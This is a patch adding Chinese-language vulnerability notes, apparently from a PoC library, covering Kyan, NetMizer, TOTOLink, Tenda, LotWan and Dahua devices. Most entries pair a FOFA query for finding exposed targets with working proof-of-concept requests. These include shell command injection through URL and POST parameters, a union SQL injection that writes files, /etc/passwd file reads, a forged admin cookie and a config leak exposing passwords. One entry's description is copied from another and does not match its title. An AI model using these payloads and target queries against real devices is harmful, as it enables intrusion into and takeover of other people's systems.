+发送POST请求包
+
+```
+fileselection=/etc/passwd
+```
+
+![image-20220519184600379](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191846469.png)
--- a/远程命令执行漏洞.md
+++ b/远程命令执行漏洞.md
@ -0,0 +1,170 @@
+# Kyan 网络监控设备 license.php 远程命令执行漏洞
+
+## 漏洞描述
+
+Kyan 网络监控设备 license.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，可以获取服务器权限，存在远程命令执行漏洞
+
+## 漏洞影响
+
+```
+Kyan
+```
+
+## FOFA
+
+```
+app="Kyan设计"
+```
+
+## 漏洞复现
+
+登录页面如下
+
+![image-20220519175106605](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191751697.png)
+
+存在漏洞的文件: `/license.php`
+
+```
+<?php
+require_once 'config.php';
+require_once 'functions.php';
+require_once 'international.php';
+session_start();
+auth_check();
+
+$BASH = "";
+if (is_windows()) {
+	$BASH = "c:\\cygwin\\bin\\bash --login -c ";
+	$PREFIX = "/cygdrive/z/writable/";
+	$PREFIX2 = "/cygdrive/z/";
+} else {
+	$BASH = "/bin/bashsuid -p -c ";
+	$PREFIX = "/config/";
+	$PREFIX2 = "/";
+}
+$encrypt_key = 'enc@leadmeet';
+if ($_SERVER['REQUEST_METHOD'] == 'POST') {
+	if (!isset($_FILES['fileupload'])) {
+		show_error(lang_get('no file specified'));
+		exit;
+	}
+	if ($_FILES['fileupload']['size'] == 0) {
+		show_error(lang_get('file size is zero'));
+		exit;
+	}
+	$fileupload = $_FILES['fileupload'];
+	$destdir = $PREFIX . 'licenses';
+	$pkg_extract_dir =  $PREFIX2 . 'licenses';
+	$tmpname = $fileupload['tmp_name'];
+	if (is_windows()) {
+		$bn = basename($tmpname);
+		$command = "move /Y \"". $tmpname . "\" c:\\cygwin\\dev\\shm\\" . $bn;
+		shell_exec($command);
+		$tmpname = "/dev/shm/" . $bn;
+	}
+	shell_exec($BASH."\"mkdir -p /dev/shm/upload && chmod -R 777 /dev/shm/ \"");
+	exec($BASH."\"cd /dev/shm/upload && ( bzcat " . $tmpname . " | openssl bf-cbc -d -k " . $encrypt_key . " | cpio -idu )\"", $output, $ret);
+	if($ret <> 0)
+	{
+		show_error(lang_get('Extract file failed'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	exec($BASH."\"cd /dev/shm/upload && md5sum -c md5sum\"", $output, $ret);
+	if($ret <> 0)
+	{
+		show_error(lang_get('MD5 check failed'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	if (is_windows())
+		$dh = opendir('c:\\cygwin\\dev\\shm\\upload');
+	else
+		$dh = opendir('/dev/shm/upload');
+	if(!$dh)
+	{
+		show_error(lang_get('can not open dest dir to copy'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	exec($BASH."\"touch /tmp/mmap_watch_pause\"");
+	while($file = readdir($dh))
+	{
+		if(is_dir($file)) continue;
+		$file = trim($file);
+		if(ereg('\.lic$', $file))
+		{
+			$filetitle = basename($file, '.lic');
+			$extract_dir = $pkg_extract_dir  . '/' . $filetitle;
+			exec($BASH."\"" . $extract_dir . "/.init stop\"");
+			exec($BASH."\"mkdir -p " . $destdir . " && mv -f /dev/shm/upload/" . $file . " " . $destdir . "\"");
+			exec($BASH."\"rm -rf " . $extract_dir . " && mkdir -p " . $extract_dir . " && cd " . $extract_dir . " && bzcat " . $destdir . '/' . $file . " | cpio -idu \"");
+		}
+	}
+	if (!is_windows())
+		exec($BASH."\"/sbin/ldconfig\"");
+	else
+		exec($BASH."\"rm -rf ". $tmpname ."\"");
+	exec($BASH."\"rm -f /tmp/mmap_watch_pause\"");
+	exec($BASH."\"rm -rf /dev/shm/upload\"");
+}
+if (isset($_GET['cmd']) && isset($_GET['name'])) {
+	$cmd = $_GET['cmd'];
+	if ($cmd == 'delete') {
+		$name = $_GET['name'];
+		exec($BASH."\"rm -f ". $PREFIX ."licenses/".$name."\"");
+	}
+}
+print_html_begin('license');
+echo "<table style=\"width:500px\"  border='0' align='center' cellpadding='3' cellspacing='1'>\n";
+echo "<th colspan=2>".lang_get('licenses')."</th>\n";
+echo "<tr><td>".lang_get('name')."</td><td>".lang_get('operation')."</td></tr>\n";
+if (is_windows())
+	$dh = opendir('z:\\writable\\licenses');
+else
+	$dh = opendir('/config/licenses');
+if ($dh) {
+	while ($file = readdir($dh)) {
+		if (is_dir($file))
+			continue;
+		$file = trim($file);
+		if (!ereg('\.lic$', $file))
+			continue;
+		$filetitle = basename($file, '.lic');
+		echo "<tr><td align=center>".$filetitle."</td><td>";
+		echo "</td></tr>\n";
+	}
+}
+echo "</table>\n<br>\n";
+echo "<body>\n";
+echo "<table style=\"width:500px\"  border='0' align='center' cellpadding='3' cellspacing='1'>\n";
+echo "<form action=\"".$_server['php_self']."\" method=\"post\" enctype=\"multipart/form-data\">\n";
+echo "<input type=\"hidden\" name=\"max_file_size\" value=\"200000000\">\n";
+echo "<th align=\"center\" colspan=\"2\">".lang_get('licenses to upload')."</th>";
+echo "<tr class=\"tablebody1\"> <td align=\"right\" width=\"50%\">" .lang_get('select file')."</td><td align=\"left\"> <input type=\"file\" name=\"fileupload\"> </td></tr>";
+echo "<tr class=\"tablebody2\"> <td align=\"center\" colspan=\"2\">  <input type=\"submit\" name=\"submit\" value=".lang_get('upload')."> </td></tr>";
+echo "</form>\n</table>\n";
+echo "</body>\n";
+print_html_end();
+?>
+```
+
+其中需要注意的位置
+
+```
+if (isset($_GET['cmd']) && isset($_GET['name'])) {
+	$cmd = $_GET['cmd'];
+	if ($cmd == 'delete') {
+		$name = $_GET['name'];
+		exec($BASH."\"rm -f ". $PREFIX ."licenses/".$name."\"");
+	}
+}
+```
+
+由于变量可控，构造POC执行任意命令
+
+```
+/license.php?cmd=delete&name=;id>1.txt
+```
+
+![image-20220519174931768](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191749819.png)
--- a/远程命令执行漏洞.md
+++ b/远程命令执行漏洞.md
@ -0,0 +1,176 @@
+# Kyan 网络监控设备 module.php 远程命令执行漏洞
+
+## 漏洞描述
+
+Kyan 网络监控设备 module.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，可以获取服务器权限，存在远程命令执行漏洞
+
+## 漏洞影响
+
+```
+Kyan
+```
+
+## FOFA
+
+```
+app="Kyan设计"
+```
+
+## 漏洞复现
+
+登录页面如下
+
+![image-20220519175106605](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191751171.png)
+
+存在漏洞的文件: `/module.php`
+
+```
+<?php
+require_once 'config.php';
+require_once 'functions.php';
+require_once 'international.php';
+session_start();
+auth_check();
+
+$BASH = "";
+if (is_windows()) {
+	$BASH = "c:\\cygwin\\bin\\bash --login -c ";
+	$PREFIX = "/cygdrive/z/writable/";
+	$PREFIX2 = "/cygdrive/z/";
+} else {
+	$BASH = "/bin/bashsuid -p -c ";
+	$PREFIX = "/config/";
+	$PREFIX2 = "/";
+}
+$encrypt_key = 'enc@leadmeet';
+if ($_SERVER['REQUEST_METHOD'] == 'POST') {
+	if (!isset($_FILES['fileupload'])) {
+		show_error(lang_get('no file specified'));
+		exit;
+	}
+	if ($_FILES['fileupload']['size'] == 0) {
+		show_error(lang_get('file size is zero'));
+		exit;
+	}
+	$fileupload = $_FILES['fileupload'];
+	$destdir = $PREFIX.'pkgs';
+	$pkg_extract_dir = $PREFIX2.'pkgs';
+	$tmpname = $fileupload['tmp_name'];
+	if (is_windows()) {
+		$bn = basename($tmpname);
+		$command = "move /Y \"". $tmpname . "\" c:\\cygwin\\dev\\shm\\" . $bn;
+		shell_exec($command);
+		$tmpname = "/dev/shm/" . $bn;
+	}
+	shell_exec($BASH."\"mkdir -p /dev/shm/upload && chmod -R 777 /dev/shm/ \"");
+	exec($BASH."\"cd /dev/shm/upload && ( bzcat " . $tmpname . " | openssl bf-cbc -d -k " . $encrypt_key . " | cpio -idu )\"", $output, $ret);
+	if($ret <> 0)
+	{
+		show_error(lang_get('Extract file failed'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	exec($BASH."\"cd /dev/shm/upload && md5sum -c md5sum\"", $output, $ret);
+	if($ret <> 0)
+	{
+		show_error(lang_get('MD5 check failed'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	if (is_windows())
+		$dh = opendir('c:\\cygwin\\dev\\shm\\upload');
+	else
+		$dh = opendir('/dev/shm/upload');
+	if(!$dh)
+	{
+		show_error(lang_get('can not open dest dir to copy'));
+		exec($BASH."\"rm -rf /dev/shm/upload\"");
+		exit;
+	}
+	exec($BASH."\"touch /tmp/mmap_watch_pause\"");
+	while($file = readdir($dh))
+	{
+		if(is_dir($file)) continue;
+		$file = trim($file);
+		if(ereg('\.pkg$', $file))
+		{
+			$filetitle = basename($file, '.pkg');
+			$extract_dir = $pkg_extract_dir  . '/' . $filetitle;
+			exec($BASH."\"" . $extract_dir . "/.init stop\"");
+			exec($BASH."\"mkdir -p " . $destdir . " && mv -f /dev/shm/upload/" . $file . " " . $destdir . "\"");
+			exec($BASH."\"rm -rf " . $extract_dir . " && mkdir -p " . $extract_dir . " && cd " . $extract_dir . " && bzcat " . $destdir . '/' . $file . " | cpio -idu \"");
+		}
+	}
+	if (!is_windows())
+		exec($BASH."\"/sbin/ldconfig\"");
+	else
+		exec($BASH."\"rm -rf ". $tmpname ."\"");
+	exec($BASH."\"rm -f /tmp/mmap_watch_pause\"");
+	exec($BASH."\"rm -rf /dev/shm/upload\"");
+}
+if (isset($_GET['cmd']) && isset($_GET['name'])) {
+	$cmd = $_GET['cmd'];
+	if ($cmd == 'delete') {
+		$name = $_GET['name'];
+		exec($BASH."\"rm -f ".$PREFIX."pkgs/".$name."\"");
+		if (is_windows())
+			exec($BASH."\"rm -rf ".$PREFIX2."pkgs/".$name."\"");
+	}
+}
+print_html_begin('module');
+echo "<body>\n";
+echo "<table style=\"width:500px\"  border='0' align='center' cellpadding='3' cellspacing='1'>\n";
+echo "<th colspan=2>".lang_get('modules')."</th>\n";
+echo "<tr><td>".lang_get('name')."</td><td>".lang_get('operation')."</td></tr>\n";
+if (is_windows())
+	$dh = opendir('z:\\writable\\pkgs');
+else
+	$dh = opendir('/config/pkgs');
+if ($dh) {
+	while ($file = readdir($dh)) {
+		if (is_dir($file))
+			continue;
+		$file = trim($file);
+		if (!ereg('\.pkg$', $file))
+			continue;
+		$filetitle = basename($file, '.pkg');
+		echo "<tr><td align=center>".$filetitle."</td><td>";
+		if (user_is_admin())
+			echo "<a href=\"/module.php?cmd=delete&name=".$filetitle.".pkg\">".lang_get('delete')."</a>";
+		echo "</td></tr>\n";
+	}
+}
+echo "</table>\n<br>\n";
+echo "<table style=\"width:500px\"  border='0' align='center' cellpadding='3' cellspacing='1'>\n";
+echo "<form action=\"".$_server['php_self']."\" method=\"post\" enctype=\"multipart/form-data\">\n";
+echo "<input type=\"hidden\" name=\"max_file_size\" value=\"200000000\">\n";
+echo "<th align=\"center\" colspan=\"2\">".lang_get('modules to upload')."</th>";
+echo "<tr> <td align=\"right\" width=\"50%\">" .lang_get('select file')."</td><td align=\"left\"> <input type=\"file\" name=\"fileupload\"> </td></tr>";
+echo "<tr> <td align=\"center\" colspan=\"2\">  <input type=\"submit\" name=\"submit\" value=".lang_get('upload')."> </td></tr>";
+echo "</form>\n</table>\n";
+echo "</body>\n";
+print_html_end();
+?>
+```
+
+其中需要注意的部分
+
+```
+if (isset($_GET['cmd']) && isset($_GET['name'])) {
+	$cmd = $_GET['cmd'];
+	if ($cmd == 'delete') {
+		$name = $_GET['name'];
+		exec($BASH."\"rm -f ".$PREFIX."pkgs/".$name."\"");
+		if (is_windows())
+			exec($BASH."\"rm -rf ".$PREFIX2."pkgs/".$name."\"");
+	}
+}
+```
+
+参数均可控，构造POC
+
+```
+/module.php?cmd=delete&name=;id>1.txt;
+```
+
+![image-20220519175150343](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191751384.png)
--- a/远程命令执行漏洞.md
+++ b/远程命令执行漏洞.md
@ -0,0 +1,281 @@
+# Kyan 网络监控设备 time.php 远程命令执行漏洞
+
+## 漏洞描述
+
+Kyan 网络监控设备 time.php 可在身份验证的情况下执行任意命令, 配合账号密码泄露漏洞，可以获取服务器权限，存在远程命令执行漏洞
+
+## 漏洞影响
+
+```
+Kyan
+```
+
+## FOFA
+
+```
+app="Kyan设计"
+```
+
+## 漏洞复现
+
+登录页面如下
+
+![image-20220519175106605](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191753857.png)
+
+存在漏洞的文件: `/time.php`
+
+```
+<?php
+require_once 'functions.php';
+require_once 'international.php';
+
+session_start();
+auth_check();
+
+//showHeader('Route', array('table.css'));
+if($_SERVER['REQUEST_METHOD'] == 'POST')
+{
+	if(!user_is_admin())
+	{
+		showErrMessage("permission denied");
+		exit;
+	}
+	$timesynctype = $_POST["timesynctype"];
+	if($timesynctype!="client")
+	{
+		$output = shell_exec("/bin/bashsuid -p -c \"/usr/sbin/ntpdate " .$timesynctype. "\"");
+		showMessage($output);		
+		shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
+	}else
+	{
+		$ctime = $_POST["ctime"];
+		shell_exec("/bin/bashsuid -p -c \"date " .$ctime. "\"");
+		shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
+	}
+}
+        echo "<html xmlns=\"http://www.w3.org/1999/xhtml\">\n";
+        echo "  <head>\n";
+        echo "    <meta http-equiv=\"Content-Type\" content=\"text/html; charset=UTF-8\" />\n";
+        echo "    <meta http-equiv=\"Content-Style-Type\" content=\"text/css\" />\n";
+        echo "    <meta http-equiv=\"Content-Script-Type\" content=\"text/javascript\" />\n";
+        echo "    <link type=\"text/css\" rel=\"stylesheet\" href=\"./templates/clean.css\" title=\"PSI_Template\"/>\n";
+        echo "    <title>time</title>\n";
+	echo "<style type=\"text/css\">";
+	echo "th, td, h3 {";
+	echo "font-size: 12px;";
+	echo "}";
+	echo "</style>";
+        echo "  </head>\n";	
+
+//print_html_begin("time");
+?>
+<script language="javascript" type="text/javascript">
+//因程序执行耗费时间,所以时间并不十分准确,误差大约在2000毫秒以下
+var xmlHttp = false;
+//获取服务器时间
+try {
+  xmlHttp = new ActiveXObject("Msxml2.XMLHTTP");
+} catch (e) {
+  try {
+    xmlHttp = new ActiveXObject("Microsoft.XMLHTTP");
+  } catch (e2) {
+    xmlHttp = false;
+  }
+}
+
+if (!xmlHttp && typeof XMLHttpRequest != 'undefined') {
+  xmlHttp = new XMLHttpRequest();
+}
+
+xmlHttp.open("GET", "null.txt", false);
+xmlHttp.setRequestHeader("Range", "bytes=-1");
+xmlHttp.send(null);
+
+severtime=new Date(xmlHttp.getResponseHeader("Date"));
+
+//获取服务器日期
+var year=severtime.getFullYear();
+var month=severtime.getMonth()+1;
+var date=severtime.getDate();
+//获取服务器时间
+var hour=severtime.getHours();
+var minu=severtime.getMinutes();
+var seco=severtime.getSeconds();
+//获取客户端时间
+localtime=new Date();
+//取得时间差
+var jtime=Math.abs(localtime.getTime()-severtime.getTime());
+var jdate=jtime/(24*60*60*1000);
+var jhour=jtime%(24*60*60*1000)/(60*60*1000);
+var jminu=jtime%(24*60*60*1000)%(60*60*1000)/(60*1000);
+var jsecond=jtime%(24*60*60*1000)%(60*60*1000)%(60*1000)/1000;
+
+//格式化输出客户端时间
+function getClientTime(){
+localtime=new Date();
+var cyear=localtime.getFullYear();
+var cmonth=localtime.getMonth()+1;
+var cdate=localtime.getDate();
+var chour=localtime.getHours();
+var cminu=localtime.getMinutes();
+var cseco=localtime.getSeconds();
+
+ccyear=addZero(cyear);
+ccmonth=addZero(cmonth);
+ccdate=addZero(cdate);
+cchour=addZero(chour);
+ccminu=addZero(cminu);
+ccseco=addZero(cseco);
+
+ document.getElementById("clienttime").innerHTML=ccyear+"-"+ccmonth+"-"+ccdate+" "+cchour+":"+ccminu+":"+ccseco;
+ document.getElementById("ctime").value= ccmonth+""+ccdate+""+cchour+""+ccminu+""+ccyear+"."+ccseco;
+}
+//格式化输出服务器时间
+function getSeverTime(){
+  seco++;
+ if(seco==60){
+  minu+=1;
+  seco=0;
+  }
+ if(minu==60){
+   hour+=1;
+   minu=0;
+ }
+ if(hour==24){ 
+  date+=1;
+  hour=0;
+ }
+//日期处理
+if(month==1||month==3||month==5||month==7
+||month==8||month==10||month==12)
+ {
+  if(date==32)
+  {
+   date=1;
+   month+=1;
+   }
+ }else if(month==4||month==6||month==9||month==11){
+  if(date==31){
+   date=1;
+   month+=1;
+   }
+ }else if(month==2){
+   if(year%4==0&&year%100!=0){//闰年处理
+    if(date==29){
+     date=1;
+     month+=1;
+    }
+   }else{
+    if(date==28){
+     date=1;
+     month+=1;
+    }
+   }
+ }
+ if(month==13){
+ year+=1;
+ month=1;
+ }
+ sseco=addZero(seco);
+ sminu=addZero(minu);
+ shour=addZero(hour);
+ sdate=addZero(date);
+ smonth=addZero(month);
+ syear=year;
+ 
+ document.getElementById("servertime").innerHTML=syear+"-"+smonth+"-"+sdate+" "+shour+":"+sminu+":"+sseco;
+ setTimeout("getSeverTime()",1000);
+ setTimeout("getClientTime()",100);
+}
+
+function addZero(num) {
+num=Math.floor(num);
+return ((num <= 9) ? ("0" + num) : num);
+}
+function updatetime()
+{
+	return true;
+}
+</script>
+
+<body onLoad="getSeverTime();">
+<table style='width:500px' border='0' align='center' cellpadding='3' cellspacing='1'>
+<th colspan="2"><?php echo lang_get('Timer'); ?></th>
+<tr ><td align='right' width=50%><?php echo lang_get('System time')?></td><td align='left'><div id="servertime"></div></td></tr>
+<tr ><td align='right'><?php echo lang_get('Client time')?></td><td align='left'><div id="clienttime"></div></td></tr>
+<tr ><td colspan="2" align="center">
+<form name="Form1" method="post" action=<?php echo $_SERVER['PHP_SELF']?>>
+<input type="hidden" name="cdate" id="cdate" value=""/>
+<input type="hidden" name="ctime" id="ctime" value=""/>
+<?php echo lang_get('Sync Source');?>:
+<select name="timesynctype" id="timesynctype" >
+<option value="time.windows.com" selected="selected">time.windows.com</option>
+<option value="time.nist.gov">time.nist.gov</option>
+<?php 
+/*$system_lic_file = '/mnt/licenses/system/system.dat';
+$bsynctoclient=false;
+if(file_exists($system_lic_file))
+{
+	$output = shell_exec("/bin/bashsuid -p -c \"openssl bf-cbc -K 000102030405060708090A0B0C0D0E0F -iv 0102030405060708 -d -in /mnt/licenses/system/system.dat |grep -v \"^;\"|grep Expire\"");
+	if($output == "")
+	{
+		$bsynctoclient = true;
+	}else
+	{
+		$bsynctoclient = false;
+	}
+	
+}
+if($bsynctoclient)
+{*/
+	echo "<option value=\"client\" >".lang_get('PC Client')."</option>";
+/* } */
+
+?>
+
+</select>
+<input  type="submit" name="update" id="update" value="<?php echo lang_get('Update Now');?>" />
+</form>
+</td></tr>
+</table>
+</body>
+</html>
+<?php
+//print_html_end();
+?>
+```
+
+其中需要注意的地方
+
+```
+if($_SERVER['REQUEST_METHOD'] == 'POST')
+{
+	if(!user_is_admin())
+	{
+		showErrMessage("permission denied");
+		exit;
+	}
+	$timesynctype = $_POST["timesynctype"];
+	if($timesynctype!="client")
+	{
+		$output = shell_exec("/bin/bashsuid -p -c \"/usr/sbin/ntpdate " .$timesynctype. "\"");
+		showMessage($output);		
+		shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
+	}else
+	{
+		$ctime = $_POST["ctime"];
+		shell_exec("/bin/bashsuid -p -c \"date " .$ctime. "\"");
+		shell_exec("/bin/bashsuid -p -c \"hwclock --systohc\"");
+	}
+}
+```
+
+参数均可控，构造POC
+
+```
+POST /time.php
+
+timesynctype=;id>2.txt
+```
+
+![image-20220519175346874](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191753984.png)
--- a/远程命令执行漏洞.md
+++ b/远程命令执行漏洞.md
@ -0,0 +1,31 @@
+# NetMizer 日志管理系统 cmd.php 远程命令执行漏洞
+
+## 漏洞描述
+
+NetMizer 日志管理系统 cmd.php中存在远程命令执行漏洞，攻击者通过传入 cmd参数即可命令执行
+
+## 漏洞影响
+
+```
+NetMizer 日志管理系统
+```
+
+## FOFA
+
+```
+title="NetMizer 日志管理系统"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519175506872](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191755197.png)
+
+验证POC
+
+```
+/data/manage/cmd.php?cmd=id
+```
+
+![image-20220519175604237](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191756275.png)
--- a/网络设备漏洞/NetMizer
+++ b/网络设备漏洞/NetMizer
@ -0,0 +1,31 @@
+# NetMizer 日志管理系统 data 目录遍历漏洞
+
+## 漏洞描述
+
+北京灵州网络技术有限公司NetMizer日志管理系统存在目录遍历漏洞，由于 /data 控制不严格，攻击者可利用该漏洞获取敏感信息。
+
+## 漏洞影响
+
+```
+NetMizer 日志管理系统
+```
+
+## FOFA
+
+```
+title="NetMizer 日志管理系统"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519175506872](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191757812.png)
+
+验证POC
+
+```
+/data
+```
+
+![image-20220519175728991](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191757072.png)
--- a/网络设备漏洞/TOTOLink
+++ b/网络设备漏洞/TOTOLink
@ -0,0 +1,92 @@
+# TOTOLink 多个设备 download.cgi 远程命令执行漏洞 CVE-2022-25084
+
+## 漏洞描述
+
+TOTOLink 多个设备 download.cgi文件存在远程命令执行漏洞，攻击者通过构造特殊的请求可以获取服务器权限
+
+## 漏洞影响
+
+```
+TOTOLink 多个设备
+```
+
+## 网络测绘
+
+```
+"totolink"
+```
+
+## 漏洞复现
+
+下载路由器固件
+
+![image-20220519180647333](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191806401.png)
+
+使用binwalk分解固件
+
+![image-20220519180700129](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191807189.png)
+
+查看分解出来的文件
+
+![image-20220519180713772](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191807833.png)
+
+使用qemu搭建路由器
+
+```
+#set network
+sudo brctl addbr virbr2
+sudo ifconfig virbr2 192.168.6.1/24 up
+sudo tunctl -t tap2
+sudo ifconfig tap2 192.168.6.11/24 up
+sudo brctl addif virbr2 tap2
+
+qemu-system-mipsel -M malta -kernel vmlinux-3.2.0-4-4kc-malta -hda debian_wheezy_mipsel_standard.qcow2 -append "root=/dev/sda1" -netdev tap,id=tapnet,ifname=tap2,script=no -device rtl8139,netdev=tapnet -nographic
+```
+
+创建后在qemu里执行命令启动路由器
+
+```
+ifconfig eth0 192.168.6.11 up 
+scp -r squashfs-root/ root@192.168.6.11:/root/    	
+chroot ./squashfs-root/ /bin/sh
+touch /var/run/lighttpd.pid
+./bin/lighttpd -f ./lighttp/lighttpd.conf -m ./lighttp/lib
+```
+
+注意 `lighttpd.conf` 文件需要修改 `server.pid-file` 参数
+
+![image-20220519180729455](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191807515.png)
+
+启动后访问路由器页面
+
+![image-20220519180743756](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191807814.png)
+
+我们找到需要分析的文件目录 `squashfs-root/web_cste/cgi-bin`
+
+![image-20220519180807271](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191808361.png)
+
+分析 cgi文件 `downloadFile.cgi`
+
+![image-20220519180821187](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191808273.png)
+
+我们注意到其中的system执行命令
+
+```
+pcVar1 = getenv("QUERY_STRING");
+memset(acStack1424,0,0x200);
+memset(acStack912,0,0x200);
+sprintf(acStack1424,"echo QUERY_STRING:%s >/tmp/download",pcVar1);
+system(acStack1424);
+```
+
+其中 getenv 从请求Url中获取参数,传参给pcVar1，再通过下面的sprintf 赋值给 acStack1424 使用 system函数 进行命令执行
+
+![image-20220519180833486](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191808559.png)
+
+我们构造请求包控制 QUERY_STRING 参数来进行恶意命令执行
+
+```
+/cgi-bin/downloadFlile.cgi?payload=`ls>../cmd.txt`
+```
+
+![image-20220519180852180](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191808272.png)
--- a/网络设备漏洞/Tenda
+++ b/网络设备漏洞/Tenda
@ -0,0 +1,31 @@
+# Tenda 11N无线路由器 Cookie 越权访问漏洞
+
+## 漏洞描述
+
+Tenda 11N无线路由器由于只验证Cookie，导致任意用户伪造Cookie即可进入后台
+
+## 漏洞影响
+
+```
+Tenda 11N无线路由器
+```
+
+## FOFA
+
+```
+app="TENDA-11N无线路由器"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519180949727](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191809768.png)
+
+添加Cookie, 访问 index.asp 进入后台
+
+```
+admin:language=cn
+```
+
+![image-20220519181248549](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191812628.png)
--- a/配置文件泄漏漏洞.md
+++ b/配置文件泄漏漏洞.md
@ -0,0 +1,29 @@
+# Tenda W15E企业级路由器 RouterCfm.cfg 配置文件泄漏漏洞
+
+## 漏洞描述
+
+Tenda 企业级路由器 RouterCfm.cfg 配置文件可在未授权的情况下被读取，导致账号密码等敏感信息泄漏
+
+## 漏洞影响
+
+```
+Tenda 企业级路由器
+```
+
+## FOFA
+
+```
+title=="Tenda | Login" && country="CN"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519181331832](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191813876.png)
+
+访问路径![image-20220519181508329](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191815422.png)
+
+后台账号密码位于参数 `sys.userpass` base64解密后的字符
+
+![image-20220519181456848](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191814923.png)
--- a/网络设备漏洞/华夏创新
+++ b/网络设备漏洞/华夏创新
@ -0,0 +1,33 @@
+# 华夏创新 LotWan广域网优化系统 check_instance_state.php 远程命令执行漏洞
+
+## 漏洞描述
+
+华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接，导致远程命令执行漏洞
+
+## 漏洞影响
+
+```
+华夏创新 LotWan广域网优化系统
+```
+
+## FOFA
+
+```
+title="LotWan 广域网优化系统"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519182517187](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191825272.png)
+
+存在漏洞的文件为
+
+```
+/acc/check_instance_state.php?ins=;id>cmd.txt
+```
+
+再访问 `/acc/cmd.txt`
+
+![image-20220519182529097](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191825165.png)
--- a/网络设备漏洞/华夏创新
+++ b/网络设备漏洞/华夏创新
@ -0,0 +1,35 @@
+# 华夏创新 LotWan广域网优化系统 static_arp.php 远程命令执行漏洞
+
+## 漏洞描述
+
+华夏创新 LotWan广域网优化系统 static_arp.php文件参数 ethName存在命令拼接，导致远程命令执行漏洞
+
+## 漏洞影响
+
+```
+华夏创新 LotWan广域网优化系统
+```
+
+## FOFA
+
+```
+title="LotWan 广域网优化系统"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519182832800](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828884.png)
+
+存在漏洞的文件为
+
+```
+/acc/bindipmac/static_arp.php?ethName=||id>cmd.txt||
+```
+
+![image-20220519182841776](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828819.png)
+
+再访问 `/acc/bindipmac/cmd.txt`
+
+![image-20220519182859597](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191828666.png)
--- a/网络设备漏洞/华夏创新
+++ b/网络设备漏洞/华夏创新
@ -0,0 +1,33 @@
+# 华夏创新 LotWan广域网优化系统 static_arp_del.php SQL注入漏洞
+
+## 漏洞描述
+
+华夏创新 LotWan广域网优化系统check_instance_state.php文件参数 ins存在命令拼接，导致远程命令执行漏洞
+
+## 漏洞影响
+
+```
+华夏创新 LotWan广域网优化系统
+```
+
+## FOFA
+
+```
+title="LotWan 广域网优化系统"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519182931309](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829394.png)
+
+存在漏洞的文件为 static_arp_del.php, 通过union注入写入文件
+
+```
+/acc/bindipmac/static_arp_del.php?x=1&arpName=1' and 0 union select 1,'||id>cmd.txt||',3,4,5,6,7,8--
+```
+
+再访问 `/acc/bindipmac/cmd.txt`
+
+![image-20220519182946695](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191829769.png)
--- a/网络设备漏洞/大华城市安防监控系统平台管理
+++ b/网络设备漏洞/大华城市安防监控系统平台管理
@ -0,0 +1,31 @@
+# 大华 城市安防监控系统平台管理 attachment_downloadByUrlAtt.action 任意文件下载漏洞
+
+## 漏洞描述
+
+大华城市安防监控系统平台管理存在任意文件下载漏洞，攻击者通过漏洞可以下载服务器上的任意文件
+
+## 漏洞影响
+
+```
+大华城市安防监控系统平台管理
+```
+
+## FOFA
+
+```
+"attachment_downloadByUrlAtt.action"
+```
+
+## 漏洞复现
+
+登录页面
+
+![image-20220519183144081](https://typora-notes-1308934770.cos.ap-beijing.myqcloud.com/202205191831267.png)
+
+验证POC
+
+```
+/portal/attachment_downloadByUrlAtt.action?filePath=file:///etc/passwd
+```
+
